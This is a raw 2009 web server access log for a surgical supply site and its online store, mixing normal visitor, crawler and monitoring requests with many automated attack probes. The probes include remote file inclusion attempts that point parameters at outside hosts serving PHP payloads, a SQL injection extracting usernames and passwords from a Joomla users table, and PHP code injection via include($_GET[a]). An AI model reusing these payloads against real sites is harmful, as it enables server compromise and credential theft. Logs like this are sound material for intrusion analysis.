61.78.62.84 - - [06/Jul/2009:02:20:37 -0400] "GET /logs/access_log.Q109062500/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:02:20:37 -0400] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:02:20:38 -0400] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:02:20:41 -0400] "GET /logs/access_log.Q109062800/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
114.40.72.133 - - [06/Jul/2009:02:21:15 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Foxy/1; Foxy/1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.1)"
114.40.72.133 - - [06/Jul/2009:02:21:15 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Foxy/1; Foxy/1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.1)"
114.40.72.133 - - [06/Jul/2009:02:21:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Foxy/1; Foxy/1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.1)"
114.40.72.133 - - [06/Jul/2009:02:21:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; Foxy/1; Foxy/1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.1)"
201.160.249.77 - - [06/Jul/2009:02:21:22 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L313FEE4179A3A4003590016+M37+ENG HTTP/1.1" 200 56269 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L313FEE4B7983D4002620016+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"
201.160.249.77 - - [06/Jul/2009:02:21:23 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L313FEE4179A3A4003590016+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"
201.160.249.77 - - [06/Jul/2009:02:21:23 -0400] "GET /images/items/0031702_THUMB.JPG HTTP/1.1" 200 3589 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L313FEE4179A3A4003590016+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"
201.160.249.77 - - [06/Jul/2009:02:21:23 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L313FEE4179A3A4003590016+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"
201.160.249.77 - - [06/Jul/2009:02:21:49 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L313FEE427233C4000390016+M37+ENG HTTP/1.1" 200 38068 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L313FED437F933400F9F0016+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"
209.59.12.99 - - [06/Jul/2009:02:22:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.179.130 - - [06/Jul/2009:02:22:18 -0400] "GET /logs/access_log.Q109063000//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
87.106.179.130 - - [06/Jul/2009:02:22:18 -0400] "GET /logs/access_log.Q109060700//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:22:36 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.51.241.6 - - [06/Jul/2009:02:24:04 -0400] "GET /logs/index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:02:24:04 -0400] "GET /index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:02:24:04 -0400] "GET /logs/access_log.Q109053100/index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:02:24:05 -0400] "GET /logs/access_log.Q109061400/index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:02:24:07 -0400] "GET /logs/access_log.Q109053100/index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:02:24:08 -0400] "GET /index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:02:24:08 -0400] "GET /logs/index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
84.51.241.6 - - [06/Jul/2009:02:24:09 -0400] "GET /logs/access_log.Q109061400/index.php?option=com_restaurante&task=detail&Itemid=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
84.201.208.50 - - [06/Jul/2009:02:24:43 -0400] "GET /logs/*include/write.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:02:24:43 -0400] "GET /*include/write.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
84.201.208.50 - - [06/Jul/2009:02:24:43 -0400] "GET /logs/access_log.Q109051800/*include/write.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
190.144.44.36 - - [06/Jul/2009:02:24:53 -0400] "GET /logs/access_log.Q109060800//index.php?abg_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
190.144.44.36 - - [06/Jul/2009:02:24:53 -0400] "GET /logs//index.php?abg_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
83.16.182.130 - - [06/Jul/2009:02:25:12 -0400] "GET /logs/access_log.Q109061800%20%20//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
83.16.182.130 - - [06/Jul/2009:02:25:21 -0400] "GET /logs/access_log.Q109052300%20%20//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:25:57 -0400] "GET ///?_zb_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:25:57 -0400] "GET /logs///?_zb_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 8392 "-" "Mozilla/5.0"
67.208.139.72 - - [06/Jul/2009:02:25:57 -0400] "GET /logs/access_log.Q109051100%20%20///?_zb_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:02:27:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.18.161.226 - - [06/Jul/2009:02:28:08 -0400] "GET /logs/access_log.Q109052200//include/lib.inc.php?site_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:02:28:08 -0400] "GET //include/lib.inc.php?site_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:02:28:08 -0400] "GET /logs//include/lib.inc.php?site_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
84.201.208.50 - - [06/Jul/2009:02:28:18 -0400] "GET /logs/access_log.Q109051800%20%20/*include/write.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.18.161.226 - - [06/Jul/2009:02:28:33 -0400] "GET /logs/access_log.Q109061700//include/lib.inc.php?site_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
61.78.62.84 - - [06/Jul/2009:02:29:11 -0400] "GET /logs/access_log.Q109051100%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:02:29:11 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:02:29:12 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:02:30:21 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:02:30:52 -0400] "GET /logs/access_log.Q109060400%20/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
218.38.243.71 - - [06/Jul/2009:02:31:52 -0400] "GET //?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jul/2009:02:31:54 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:02:31:58 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jul/2009:02:32:03 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jul/2009:02:32:03 -0400] "GET //?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.38.243.71 - - [06/Jul/2009:02:32:03 -0400] "GET /logs//?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_lib/1.txt???? HTTP/1.1" 200 8391 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:02:32:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.124.127.34 - - [06/Jul/2009:02:32:06 -0400] "GET /logs//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:02:32:06 -0400] "GET /logs/access_log.Q109061800//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.124.127.34 - - [06/Jul/2009:02:32:13 -0400] "GET /logs/access_log.Q109052300//agendax/addevent.inc.php?agendax_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
202.174.82.220 - - [06/Jul/2009:02:33:36 -0400] "GET /logs/access_log.Q109060100//?_zb_path=http://www.yaco-online.com.br/mambots/tukulid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.30.65.36 - - [06/Jul/2009:02:36:27 -0400] "GET /logs/error_log.Q109051300 HTTP/1.0" 200 4525198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.65.36 - - [06/Jul/2009:02:36:29 -0400] "GET /logs/error_log.Q109051300 HTTP/1.0" 200 4525198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [06/Jul/2009:02:37:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.97.254.38 - - [06/Jul/2009:02:38:27 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
213.97.254.38 - - [06/Jul/2009:02:38:27 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
213.97.254.38 - - [06/Jul/2009:02:38:30 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
213.97.254.38 - - [06/Jul/2009:02:38:30 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
91.121.89.135 - - [06/Jul/2009:02:40:53 -0400] "GET /errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:40:53 -0400] "GET /logs/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:40:53 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:02:42:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.70 - - [06/Jul/2009:02:42:17 -0400] "GET /images/items/AlloOss3_full.jpg HTTP/1.1" 200 10925 "-" "Googlebot-Image/1.0"
91.121.89.135 - - [06/Jul/2009:02:42:49 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.65.36 - - [06/Jul/2009:02:43:51 -0400] "GET /logs/error_log.Q109031300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.89.135 - - [06/Jul/2009:02:44:00 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:45:44 -0400] "GET /logs/access_log.Q109061300%20%20/errors.php?error=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.18.161.226 - - [06/Jul/2009:02:46:00 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:02:46:00 -0400] "GET /logs/errors.php?error=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:02:46:00 -0400] "GET /errors.php?error=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:02:46:13 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.121.89.135 - - [06/Jul/2009:02:46:25 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:46:25 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:46:25 -0400] "GET /logs/access_log.Q109061400%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:02:47:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.158.98.196 - - [06/Jul/2009:02:47:56 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:02:47:57 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.158.98.196 - - [06/Jul/2009:02:47:58 -0400] "GET /logs/access_log.Q109062600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.foropoemas.es/Sources/office1.jpg??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:02:47:59 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:02:47:59 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:02:47:59 -0400] "GET //skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
61.78.62.84 - - [06/Jul/2009:02:48:19 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
190.248.10.179 - - [06/Jul/2009:02:48:59 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.248.10.179 - - [06/Jul/2009:02:48:59 -0400] "GET /logs/access_log.Q109062200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
190.248.10.179 - - [06/Jul/2009:02:48:59 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.18.161.226 - - [06/Jul/2009:02:49:06 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:02:49:06 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
67.18.161.226 - - [06/Jul/2009:02:49:06 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
190.248.10.179 - - [06/Jul/2009:02:49:32 -0400] "GET /logs/access_log.Q109063000//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:50:02 -0400] "GET //include/admin.lib.inc.php?site_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:50:02 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:50:02 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:50:18 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.18.161.226 - - [06/Jul/2009:02:51:11 -0400] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
190.248.10.179 - - [06/Jul/2009:02:51:44 -0400] "GET /logs/access_log.Q109062200%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
190.248.10.179 - - [06/Jul/2009:02:51:45 -0400] "GET /logs/access_log.Q109063000%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jul/2009:02:52:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.117.128.143 - - [06/Jul/2009:02:52:51 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.117.128.143 - - [06/Jul/2009:02:52:51 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.117.128.143 - - [06/Jul/2009:02:52:51 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:02:53:33 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:02:53:33 -0400] "GET //index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.230.156.161 - - [06/Jul/2009:02:53:33 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.89.135 - - [06/Jul/2009:02:53:36 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
